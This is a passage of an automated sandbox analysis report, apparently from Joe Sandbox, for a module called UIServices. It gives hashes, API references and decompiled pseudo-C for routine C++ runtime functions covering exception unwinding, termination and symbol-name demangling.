                                                    0x7ffc23c63bd8
                                                    0x7ffc23c63bde
                                                    0x7ffc23c63be1
                                                    0x7ffc23c63be4
                                                    0x7ffc23c63be9
                                                    0x7ffc23c63bee
                                                    0x7ffc23c63c04
                                                    0x7ffc23c63c0c
                                                    0x7ffc23c63c10
                                                    0x7ffc23c63c16
                                                    0x7ffc23c63c20
                                                    0x7ffc23c63c24
                                                    0x7ffc23c63c32
                                                    0x7ffc23c63c38
                                                    0x7ffc23c63c42
                                                    0x7ffc23c63c4c
                                                    0x7ffc23c63c5a
                                                    0x7ffc23c63c64
                                                    0x7ffc23c63c68
                                                    0x7ffc23c63c74
                                                    0x7ffc23c63c7c
                                                    0x7ffc23c63c81
                                                    0x7ffc23c63c83
                                                    0x7ffc23c63c8f
                                                    0x7ffc23c63c94
                                                    0x7ffc23c63c9b
                                                    0x7ffc23c63c9d
                                                    0x7ffc23c63ca5
                                                    0x7ffc23c63cab
                                                    0x7ffc23c63cb1
                                                    0x7ffc23c63cb3
                                                    0x7ffc23c63cb9
                                                    0x7ffc23c63cc3
                                                    0x7ffc23c63cc8
                                                    0x7ffc23c63cd1
                                                    0x7ffc23c63cdf
                                                    0x7ffc23c63ce1
                                                    0x7ffc23c63ce5
                                                    0x7ffc23c63ce7
                                                    0x7ffc23c63cf3
                                                    0x7ffc23c63d01
                                                    0x7ffc23c63d0f
                                                    0x7ffc23c63d1b
                                                    0x7ffc23c63d21
                                                    0x7ffc23c63d2a
                                                    0x7ffc23c63d2c
                                                    0x7ffc23c63d34
                                                    0x7ffc23c63d36
                                                    0x7ffc23c63d49
                                                    0x7ffc23c63d56
                                                    0x7ffc23c63d68
                                                    0x7ffc23c63d77
                                                    0x7ffc23c63d7e
                                                    0x7ffc23c63d83
                                                    0x7ffc23c63d89
                                                    0x7ffc23c63d96
                                                    0x7ffc23c63da8
                                                    0x7ffc23c63db6
                                                    0x7ffc23c63dba
                                                    0x7ffc23c63dbf
                                                    0x7ffc23c63de3

                                                    APIs
                                                      • Part of subcall function 00007FFC23C664B0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFC23C620FE), ref: 00007FFC23C664BE
                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFC23C63CB3
                                                    • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFC23C63CC3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: Frameabort$EmptyHandler3::StateUnwind
                                                    • String ID: csm$csm
                                                    • API String ID: 4108983575-3733052814
                                                    • Opcode ID: b717ccaecdb6391517578402c220b2ef0acb83a282a33f9b871b2d762923a3fa
                                                    • Instruction ID: a02b49a02eb679f2cfa0cfe7161cde3edb026f0895edc046e5c6e98e7c1d59ad
                                                    • Opcode Fuzzy Hash: b717ccaecdb6391517578402c220b2ef0acb83a282a33f9b871b2d762923a3fa
                                                    • Instruction Fuzzy Hash: 5251B632B1869986EB248F19D94426877A0FBD0B84F144375EA6D67BE6CF3CE450CF10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 64%
                                                    			E00007FFC7FFC23C6A314(void* __edx, long long __rbx, long long* __rcx, long long __rsi, void* __r10, long long _a16, long long _a24) {
                                                    				void* _v8;
                                                    				signed int _v24;
                                                    				char _v104;
                                                    				intOrPtr _v112;
                                                    				char _v120;
                                                    				signed int _t23;
                                                    				void* _t26;
                                                    				void* _t31;
                                                    				signed long long _t40;
                                                    				signed int* _t44;
                                                    				long long* _t49;
                                                    				char* _t52;
                                                    				void* _t64;
                                                    				void* _t68;
                                                    
                                                    				_a16 = __rbx;
                                                    				_a24 = __rsi;
                                                    				_t40 =  *0x23c74038; // 0x577607bbd382
                                                    				_v24 = _t40 ^ _t64 - 0x00000090;
                                                    				_t49 = __rcx;
                                                    				_t52 =  *0x23c74360; // 0x0
                                                    				_t31 = __edx;
                                                    				if ( *_t52 != sil) goto 0x23c6a35d;
                                                    				 *((intOrPtr*)(__rcx + 8)) = 0;
                                                    				 *__rcx = 0x23c71ac0;
                                                    				goto 0x23c6a40b;
                                                    				if ( *_t52 - 0x30 - 9 > 0) goto 0x23c6a385;
                                                    				 *0x23c74360 = _t52 + 1;
                                                    				E00007FFC7FFC23C66E4C( *_t52 - 0x2f, __rcx,  *_t52 - 0x2f, __r10);
                                                    				goto 0x23c6a40b;
                                                    				E00007FFC7FFC23C6D614(_t26,  &_v120,  *_t52 - 0x2f);
                                                    				if (_v112 == sil) goto 0x23c6a3e8;
                                                    				if (_t31 != 0x42) goto 0x23c6a3d8;
                                                    				asm("movsd xmm3, [esp+0x20]");
                                                    				asm("dec cx");
                                                    				E00007FFC7FFC23C6E094(_t26, _v120,  &_v104,  *_t52 - 0x2f, "%lf", _t68);
                                                    				r8b = sil;
                                                    				_t23 = E00007FFC7FFC23C669EC(_t49,  &_v104);
                                                    				goto 0x23c6a40b;
                                                    				if (_t31 != 0x41) goto 0x23c6a3e8;
                                                    				asm("movss xmm3, [esp+0x20]");
                                                    				asm("cvtps2pd xmm3, xmm3");
                                                    				goto 0x23c6a3ab;
                                                    				_t44 =  *0x23c74360; // 0x0
                                                    				_t46 =  !=  ? __rsi : 0x23c71ac0;
                                                    				 *_t49 =  !=  ? __rsi : 0x23c71ac0;
                                                    				asm("sbb eax, eax");
                                                    				 *(_t49 + 8) = _t23 & 0x00000002;
                                                    				return E00007FFC7FFC23C6F5B0( ~( *_t44), _t49, _v24 ^ _t64 - 0x00000090,  &_v104);
                                                    			}

















                                                    0x7ffc23c6a314
                                                    0x7ffc23c6a319
                                                    0x7ffc23c6a326
                                                    0x7ffc23c6a330
                                                    0x7ffc23c6a338
                                                    0x7ffc23c6a33d
                                                    0x7ffc23c6a344
                                                    0x7ffc23c6a349
                                                    0x7ffc23c6a352
                                                    0x7ffc23c6a355
                                                    0x7ffc23c6a358
                                                    0x7ffc23c6a363
                                                    0x7ffc23c6a36e
                                                    0x7ffc23c6a37b
                                                    0x7ffc23c6a380
                                                    0x7ffc23c6a38a
                                                    0x7ffc23c6a394
                                                    0x7ffc23c6a3a3
                                                    0x7ffc23c6a3a5
                                                    0x7ffc23c6a3ab
                                                    0x7ffc23c6a3c1
                                                    0x7ffc23c6a3c6
                                                    0x7ffc23c6a3d1
                                                    0x7ffc23c6a3d6
                                                    0x7ffc23c6a3db
                                                    0x7ffc23c6a3dd
                                                    0x7ffc23c6a3e3
                                                    0x7ffc23c6a3e6
                                                    0x7ffc23c6a3e8
                                                    0x7ffc23c6a3fa
                                                    0x7ffc23c6a400
                                                    0x7ffc23c6a403
                                                    0x7ffc23c6a408
                                                    0x7ffc23c6a432

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: NameName::
                                                    • String ID: %lf
                                                    • API String ID: 1333004437-2891890143
                                                    • Opcode ID: 41c30a5a5790bf6d49a00a2b2ac713d2c3ac894374eb1635645553ff8093d6db
                                                    • Instruction ID: e0aaa8bbe90d348764823d1ca0e070b5333acbd1da76d03450a6bf6f2368b226
                                                    • Opcode Fuzzy Hash: 41c30a5a5790bf6d49a00a2b2ac713d2c3ac894374eb1635645553ff8093d6db
                                                    • Instruction Fuzzy Hash: 8A31A276B08BA985E620DB29EC5027967A4FBC9B80F848272DD9D67745CF3CD442CB10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 67%
                                                    			E00007FFC7FFC23C62160(void* __rax, long long __rbx, intOrPtr* __rcx, long long _a8) {
                                                    				long long _t25;
                                                    
                                                    				_a8 = __rbx;
                                                    				_t25 =  *((intOrPtr*)(__rcx));
                                                    				if ( *_t25 == 0xe0434352) goto 0x23c621a5;
                                                    				if ( *_t25 == 0xe0434f4d) goto 0x23c621a5;
                                                    				if ( *_t25 != 0xe06d7363) goto 0x23c621b8;
                                                    				E00007FFC7FFC23C664B0(__rax);
                                                    				 *((long long*)(__rax + 0x20)) = _t25;
                                                    				E00007FFC7FFC23C664B0(__rax);
                                                    				 *((long long*)(__rax + 0x28)) =  *((intOrPtr*)(__rcx + 8));
                                                    				__imp__terminate();
                                                    				asm("int3");
                                                    				E00007FFC7FFC23C664B0(__rax);
                                                    				if ( *((intOrPtr*)(__rax + 0x30)) <= 0) goto 0x23c621b8;
                                                    				E00007FFC7FFC23C664B0(__rax);
                                                    				 *((intOrPtr*)(__rax + 0x30)) =  *((intOrPtr*)(__rax + 0x30)) - 1;
                                                    				return 0;
                                                    			}




                                                    0x7ffc23c62160
                                                    0x7ffc23c6216a
                                                    0x7ffc23c62176
                                                    0x7ffc23c6217e
                                                    0x7ffc23c62186
                                                    0x7ffc23c62188
                                                    0x7ffc23c6218d
                                                    0x7ffc23c62195
                                                    0x7ffc23c6219a
                                                    0x7ffc23c6219e
                                                    0x7ffc23c621a4
                                                    0x7ffc23c621a5
                                                    0x7ffc23c621ae
                                                    0x7ffc23c621b0
                                                    0x7ffc23c621b5
                                                    0x7ffc23c621c4

                                                    APIs
                                                      • Part of subcall function 00007FFC23C664B0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFC23C620FE), ref: 00007FFC23C664BE
                                                    • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFC23C6219E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: abortterminate
                                                    • String ID: MOC$RCC$csm
                                                    • API String ID: 661698970-2671469338
                                                    • Opcode ID: 9c7fbf4e887644f7275f1c9a96d92e35e353b5974a4e60fd92a878f094656d0a
                                                    • Instruction ID: 79566a9e66557a519625d72be23e238c26105e17a8889be6d63ec56ea5a9c3e5
                                                    • Opcode Fuzzy Hash: 9c7fbf4e887644f7275f1c9a96d92e35e353b5974a4e60fd92a878f094656d0a
                                                    • Instruction Fuzzy Hash: 56F04432A1C62AC2E750AB69EA4117C3674EFC8B45F0552B1D75816355CF3CD8A0CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 58%
                                                    			E00007FFC7FFC23C6E0F0(void* __rax, long long __rbx, long long __rcx, long long __r8, long long _a8) {
                                                    				void* _t8;
                                                    				void* _t10;
                                                    				void* _t11;
                                                    				void* _t20;
                                                    				void* _t22;
                                                    				void* _t27;
                                                    
                                                    				_a8 = __rbx;
                                                    				_t8 = E00007FFC7FFC23C6E340(_t11, __rax, __rcx, __rcx, _t20, _t22, __r8, _t27);
                                                    				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0x23c6e131;
                                                    				if ( *((intOrPtr*)(__rcx)) != 0xe06d7363) goto 0x23c6e131;
                                                    				if (_t8 != 1) goto 0x23c6e131;
                                                    				E00007FFC7FFC23C664B0(__rax);
                                                    				 *((long long*)(__rax + 0x20)) = __rcx;
                                                    				_t10 = E00007FFC7FFC23C664B0(__rax);
                                                    				 *((long long*)(__rax + 0x28)) = __r8;
                                                    				__imp__terminate();
                                                    				asm("int3");
                                                    				return _t10;
                                                    			}









                                                    0x7ffc23c6e0f0
                                                    0x7ffc23c6e100
                                                    0x7ffc23c6e109
                                                    0x7ffc23c6e111
                                                    0x7ffc23c6e116
                                                    0x7ffc23c6e118
                                                    0x7ffc23c6e11d
                                                    0x7ffc23c6e121
                                                    0x7ffc23c6e126
                                                    0x7ffc23c6e12a
                                                    0x7ffc23c6e130
                                                    0x7ffc23c6e13b

                                                    APIs
                                                    • __C_specific_handler.LIBVCRUNTIME ref: 00007FFC23C6E100
                                                      • Part of subcall function 00007FFC23C6E340: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FFC23C6E400
                                                      • Part of subcall function 00007FFC23C6E340: RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FFC23C6E105), ref: 00007FFC23C6E44F
                                                      • Part of subcall function 00007FFC23C664B0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFC23C620FE), ref: 00007FFC23C664BE
                                                    • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFC23C6E12A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: C_specific_handlerCurrentImageNonwritableUnwindabortterminate
                                                    • String ID: csm$f
                                                    • API String ID: 2451123448-629598281
                                                    • Opcode ID: 1e7ca610bb810251593f1952af4b90bc85378ad400c43371b1f1c08f831b31bb
                                                    • Instruction ID: d73ee9ec72fe3caa674fd7607ecb7b101c4540da5a0fc72d23d9d0b0bd4100ed
                                                    • Opcode Fuzzy Hash: 1e7ca610bb810251593f1952af4b90bc85378ad400c43371b1f1c08f831b31bb
                                                    • Instruction Fuzzy Hash: EDE0E571F0826A81E7206B34BA8013C66A8EF84F54F1482B1EB881674BCE3DD4A0CA51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 85%
                                                    			E00007FFC7FFC23C698C8(void* __edi, void* __eflags, void* __rax, long long __rbx, signed long long* __rcx, void* __rdx, void* __rdi, long long __rsi, void* __r8, long long __r12, long long _a8, long long _a16, long long _a24) {
                                                    				void* _v24;
                                                    				char _v56;
                                                    				char _v72;
                                                    				signed int _v80;
                                                    				signed long long _v88;
                                                    				signed long long _v96;
                                                    				char _v104;
                                                    				signed int _v112;
                                                    				char _v120;
                                                    				signed int _t70;
                                                    				void* _t85;
                                                    				void* _t86;
                                                    				signed int _t96;
                                                    				signed int _t98;
                                                    				signed int _t99;
                                                    				signed long long _t106;
                                                    				intOrPtr* _t126;
                                                    				intOrPtr* _t127;
                                                    				long long _t129;
                                                    				long long _t130;
                                                    				signed char* _t131;
                                                    				intOrPtr* _t132;
                                                    				intOrPtr* _t134;
                                                    				char* _t135;
                                                    				signed long long* _t139;
                                                    				void* _t175;
                                                    				void* _t176;
                                                    				signed long long _t180;
                                                    				long long _t182;
                                                    
                                                    				_t178 = __r12;
                                                    				_t170 = __r8;
                                                    				_t164 = __rsi;
                                                    				_t163 = __rdi;
                                                    				_t155 = __rdx;
                                                    				_t95 = __edi;
                                                    				_a8 = __rbx;
                                                    				_a16 = __rsi;
                                                    				_a24 = __r12;
                                                    				_t139 = __rcx;
                                                    				 *0x23c74384 =  *0x23c74384 + 1;
                                                    				_t70 =  *0x23c74370; // 0x0
                                                    				asm("bt eax, 0xd");
                                                    				if (__eflags >= 0) goto 0x23c6992a;
                                                    				asm("btr eax, 0xd");
                                                    				 *0x23c74370 = _t70;
                                                    				E00007FFC7FFC23C697B4(0, __edi, __eflags, __rax, __rcx,  &_v104, __rdx, __rdi, __rsi, __r8);
                                                    				asm("bts dword [0xaa58], 0xd");
                                                    				 *_t139 = _v104;
                                                    				_t139[1] = _v96;
                                                    				goto 0x23c69b86;
                                                    				_t126 =  *0x23c74360; // 0x0
                                                    				if ( *_t126 != 0x3f) goto 0x23c69b6a;
                                                    				_t127 = _t126 + 1;
                                                    				 *0x23c74360 = _t127;
                                                    				if ( *_t127 != 0x3f) goto 0x23c6999a;
                                                    				if ( *((intOrPtr*)(_t127 + 1)) != 0x3f) goto 0x23c69975;
                                                    				E00007FFC7FFC23C698C8(__edi,  *((intOrPtr*)(_t127 + 1)) - 0x3f, _t127 + 1, _t139,  &_v104, _t155, __rdi, __rsi, _t170, __r12);
                                                    				_t129 =  *0x23c74360; // 0x0
                                                    				goto 0x23c6996e;
                                                    				_t130 = _t129 + 1;
                                                    				 *0x23c74360 = _t130;
                                                    				if ( *_t130 != 0) goto 0x23c69964;
                                                    				goto 0x23c69918;
                                                    				if ( *_t130 != 0x24) goto 0x23c69987;
                                                    				E00007FFC7FFC23C6C838(_t86,  *_t126, 1, __edi, _t139,  &_v120, _t155, __rdi, _t164);
                                                    				goto 0x23c699a8;
                                                    				 *0x23c74360 = _t130;
                                                    				r8d = 0;
                                                    				E00007FFC7FFC23C6ABE0(0, __edi, _t139,  &_v120, _t163, _t164, _t170, _t178);
                                                    				goto 0x23c699a8;
                                                    				r8d = 0;
                                                    				E00007FFC7FFC23C6DA5C(_t86,  *_t126, 1, _t95, _t139,  &_v120, _t163, _t164, _t170, _t175, _t176);
                                                    				_t96 = _v112;
                                                    				_t180 = _v120;
                                                    				_t106 = _t180;
                                                    				if (_t106 == 0) goto 0x23c699c2;
                                                    				asm("bt esi, 0x9");
                                                    				if (_t106 >= 0) goto 0x23c699c2;
                                                    				r12d = 1;
                                                    				goto 0x23c699c5;
                                                    				r12d = 0;
                                                    				r15d = _t96;
                                                    				r15d = r15d >> 0xf;
                                                    				r15d = r15d & 0x00000001;
                                                    				if (_v112 - 1 <= 0) goto 0x23c699e1;
                                                    				 *_t139 = _t180;
                                                    				_t139[1] = _t96;
                                                    				goto 0x23c69b86;
                                                    				_t131 =  *0x23c74360; // 0x0
                                                    				if (( *_t131 & 0x000000bf) == 0) goto 0x23c69ad4;
                                                    				E00007FFC7FFC23C6BC80(_t95, _t139,  &_v104, _t163, _t164, _t175, _t176, _t178);
                                                    				if (_v104 == 0) goto 0x23c69ad4;
                                                    				if ( *0x23c74374 == 0) goto 0x23c69a8b;
                                                    				 *0x23c74374 = 0;
                                                    				E00007FFC7FFC23C66F74( &_v120,  &_v88,  &_v104);
                                                    				_v120 =  *_t131;
                                                    				_v112 = _t131[8];
                                                    				_t132 =  *0x23c74360; // 0x0
                                                    				if ( *_t132 == 0x40) goto 0x23c69ad4;
                                                    				E00007FFC7FFC23C6BC80(_t95, _t139,  &_v88, _t163, _t164, _t175, _t176, _t178);
                                                    				_v104 =  *_t132;
                                                    				_v96 =  *(_t132 + 8);
                                                    				_v88 = "::";
                                                    				_v80 = 2;
                                                    				asm("movaps xmm0, [ebp-0x40]");
                                                    				asm("movdqa [ebp-0x40], xmm0");
                                                    				E00007FFC7FFC23C66F48( &_v104,  &_v72,  &_v88);
                                                    				goto 0x23c69abb;
                                                    				_t134 = "::";
                                                    				_v88 = _t134;
                                                    				_v80 = 2;
                                                    				asm("movaps xmm0, [ebp-0x40]");
                                                    				asm("movdqa [ebp-0x40], xmm0");
                                                    				E00007FFC7FFC23C66F48( &_v104,  &_v56,  &_v88);
                                                    				E00007FFC7FFC23C66F74(_t134,  &_v72,  &_v120);
                                                    				_t98 =  *(_t134 + 8);
                                                    				_t182 =  *_t134;
                                                    				_v112 = _t98;
                                                    				_v120 = _t182;
                                                    				if (r12d == 0) goto 0x23c69ae5;
                                                    				if (_t182 == 0) goto 0x23c69ae5;
                                                    				asm("bts esi, 0x9");
                                                    				_v112 = _t98;
                                                    				if (r15d == 0) goto 0x23c69af4;
                                                    				_t99 = _t98 | 0x00008000;
                                                    				_v112 = _t99;
                                                    				if (_t182 == 0) goto 0x23c699d6;
                                                    				if ((0x00001000 & _t99) != 0) goto 0x23c699d6;
                                                    				_t135 =  *0x23c74360; // 0x0
                                                    				if ( *_t135 == 0) goto 0x23c69b30;
                                                    				if ( *_t135 == 0x40) goto 0x23c69b29;
                                                    				_t139[1] = _t139[1] & 0x00000000;
                                                    				_t139[1] = 2;
                                                    				 *_t139 =  *_t139 & 0x00000000;
                                                    				goto 0x23c69b86;
                                                    				 *0x23c74360 =  *0x23c74360 + 1;
                                                    				if (( *0x23c74370 & 0x00001000) == 0) goto 0x23c69b5c;
                                                    				if (r12d != 0) goto 0x23c69b5c;
                                                    				if ((0x00008000 & _t99) != 0) goto 0x23c69b5c;
                                                    				_v88 = _v88 & 0x00000000;
                                                    				_v80 = _v80 & r12d;
                                                    				E00007FFC7FFC23C672A8(_t139,  &_v56,  &_v88);
                                                    				goto 0x23c699d6;
                                                    				_t85 = E00007FFC7FFC23C672A8(_t139, _t139,  &_v120);
                                                    				goto 0x23c69b86;
                                                    				 *_t139 =  *_t139 & 0x00000000;
                                                    				_t139[1] = _t139[1] & 0x00000000;
                                                    				if (0x8000 == 0) goto 0x23c69b7c;
                                                    				_t139[1] = 2;
                                                    				goto 0x23c69b86;
                                                    				 *_t139 = 0x23c71ac0;
                                                    				 *0x23c74384 =  *0x23c74384 - 1;
                                                    				return _t85;
                                                    			}
































                                                    0x7ffc23c698c8
                                                    0x7ffc23c698c8
                                                    0x7ffc23c698c8
                                                    0x7ffc23c698c8
                                                    0x7ffc23c698c8
                                                    0x7ffc23c698c8
                                                    0x7ffc23c698c8
                                                    0x7ffc23c698cd
                                                    0x7ffc23c698d2
                                                    0x7ffc23c698e6
                                                    0x7ffc23c698e9
                                                    0x7ffc23c698ef
                                                    0x7ffc23c698f5
                                                    0x7ffc23c698f9
                                                    0x7ffc23c698fb
                                                    0x7ffc23c698ff
                                                    0x7ffc23c6990b
                                                    0x7ffc23c69910
                                                    0x7ffc23c6991c
                                                    0x7ffc23c69922
                                                    0x7ffc23c69925
                                                    0x7ffc23c6992a
                                                    0x7ffc23c69937
                                                    0x7ffc23c6993d
                                                    0x7ffc23c69940
                                                    0x7ffc23c69949
                                                    0x7ffc23c69950
                                                    0x7ffc23c69956
                                                    0x7ffc23c6995b
                                                    0x7ffc23c69962
                                                    0x7ffc23c69964
                                                    0x7ffc23c69967
                                                    0x7ffc23c69971
                                                    0x7ffc23c69973
                                                    0x7ffc23c6997c
                                                    0x7ffc23c69980
                                                    0x7ffc23c69985
                                                    0x7ffc23c69987
                                                    0x7ffc23c6998e
                                                    0x7ffc23c69993
                                                    0x7ffc23c69998
                                                    0x7ffc23c6999a
                                                    0x7ffc23c699a3
                                                    0x7ffc23c699a8
                                                    0x7ffc23c699ab
                                                    0x7ffc23c699af
                                                    0x7ffc23c699b2
                                                    0x7ffc23c699b4
                                                    0x7ffc23c699b8
                                                    0x7ffc23c699ba
                                                    0x7ffc23c699c0
                                                    0x7ffc23c699c2
                                                    0x7ffc23c699c5
                                                    0x7ffc23c699c8
                                                    0x7ffc23c699cc
                                                    0x7ffc23c699d4
                                                    0x7ffc23c699d6
                                                    0x7ffc23c699d9
                                                    0x7ffc23c699dc
                                                    0x7ffc23c699e1
                                                    0x7ffc23c699eb
                                                    0x7ffc23c699f5
                                                    0x7ffc23c699ff
                                                    0x7ffc23c69a0c
                                                    0x7ffc23c69a0e
                                                    0x7ffc23c69a21
                                                    0x7ffc23c69a29
                                                    0x7ffc23c69a30
                                                    0x7ffc23c69a33
                                                    0x7ffc23c69a3d
                                                    0x7ffc23c69a47
                                                    0x7ffc23c69a4f
                                                    0x7ffc23c69a56
                                                    0x7ffc23c69a60
                                                    0x7ffc23c69a64
                                                    0x7ffc23c69a6b
                                                    0x7ffc23c69a6f
                                                    0x7ffc23c69a80
                                                    0x7ffc23c69a89
                                                    0x7ffc23c69a8b
                                                    0x7ffc23c69a92
                                                    0x7ffc23c69a96
                                                    0x7ffc23c69a9d
                                                    0x7ffc23c69aa1
                                                    0x7ffc23c69ab2
                                                    0x7ffc23c69ac2
                                                    0x7ffc23c69ac7
                                                    0x7ffc23c69aca
                                                    0x7ffc23c69acd
                                                    0x7ffc23c69ad0
                                                    0x7ffc23c69ad7
                                                    0x7ffc23c69adc
                                                    0x7ffc23c69ade
                                                    0x7ffc23c69ae2
                                                    0x7ffc23c69aed
                                                    0x7ffc23c69aef
                                                    0x7ffc23c69af1
                                                    0x7ffc23c69af7
                                                    0x7ffc23c69b04
                                                    0x7ffc23c69b0a
                                                    0x7ffc23c69b14
                                                    0x7ffc23c69b19
                                                    0x7ffc23c69b1b
                                                    0x7ffc23c69b1f
                                                    0x7ffc23c69b23
                                                    0x7ffc23c69b27
                                                    0x7ffc23c69b29
                                                    0x7ffc23c69b36
                                                    0x7ffc23c69b3b
                                                    0x7ffc23c69b3f
                                                    0x7ffc23c69b41
                                                    0x7ffc23c69b46
                                                    0x7ffc23c69b52
                                                    0x7ffc23c69b57
                                                    0x7ffc23c69b63
                                                    0x7ffc23c69b68
                                                    0x7ffc23c69b6a
                                                    0x7ffc23c69b6e
                                                    0x7ffc23c69b74
                                                    0x7ffc23c69b76
                                                    0x7ffc23c69b7a
                                                    0x7ffc23c69b83
                                                    0x7ffc23c69b86
                                                    0x7ffc23c69bab

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID:
                                                    • API String ID: 2943138195-0
                                                    • Opcode ID: 617483df2bc71fa7b9fd296a9a341e4663d5cd8a72fcbc277ec82a6390d51f17
                                                    • Instruction ID: 55a303a1372f50db89ed29bfec89540b8110e8e096d688b062957524ddddd566
                                                    • Opcode Fuzzy Hash: 617483df2bc71fa7b9fd296a9a341e4663d5cd8a72fcbc277ec82a6390d51f17
                                                    • Instruction Fuzzy Hash: 65918B22F0866A89FB198B68DC443AC37B4FB84718F5442B5DE4D3B695DF38A845CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 84%
                                                    			E00007FFC7FFC23C6A04C(void* __eflags, long long __rbx, signed long long* __rcx, void* __rdx, long long __rdi, char* __r8, void* __r10, long long _a8, long long _a16) {
                                                    				char _v24;
                                                    				char _v40;
                                                    				signed int _v48;
                                                    				signed int _v56;
                                                    				char _t41;
                                                    				void* _t50;
                                                    				intOrPtr* _t76;
                                                    				char* _t77;
                                                    				intOrPtr* _t78;
                                                    				char* _t79;
                                                    				signed long long* _t86;
                                                    				long long _t89;
                                                    				char* _t90;
                                                    				signed long long _t98;
                                                    				long long _t104;
                                                    				signed long long _t118;
                                                    				char* _t120;
                                                    
                                                    				_a8 = __rbx;
                                                    				_a16 = __rdi;
                                                    				_v56 = _v56 & 0x00000000;
                                                    				_t86 = __rcx;
